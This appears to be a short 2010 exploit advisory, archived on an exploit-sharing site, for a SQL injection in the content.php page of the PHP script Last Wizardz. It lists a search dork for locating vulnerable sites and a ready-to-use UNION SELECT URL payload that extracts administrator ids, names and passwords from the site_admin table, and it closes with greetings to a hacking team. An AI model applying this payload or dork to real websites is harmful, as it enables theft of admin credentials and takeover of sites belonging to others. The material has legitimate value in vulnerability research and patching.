Last Wizardz suffers from a remote SQL injection vulnerability in content.php.
9466bbdd9f32a88c81de91d8afe6f63d45dd32b067d4a917071e9ff85eebd213
Last Wizardz (content.php) Sql Injection Vulnerability
=======================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Email : F.Hack@w.cn
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : Last Wizardz
.:. Donwload Script: http://lastwiz.com/
.:. Language : php
.:. Bug Type : Sql Injection[Mysql]
.:. Dork : "Powered by Last Wizardz"
.:. Date : 31/1/2010
####################################################################
===[ Exploit ]===
www.site.com/content.php?id=[Sql Injection]
www.site.com/content.php?id=NULL+UNION+ALL+SELECT+1,CONCAT(id,0x3a,admin,0x3a,admin_pass),3,4,5,6,7,8+FROM+site_admin
####################################################################
Greats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack
________________________________
Hotmail: Trusted email with Microsoft’s powerful SPAM protection. Sign up now.<https://signup.live.com/signup.aspx?id=60969>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed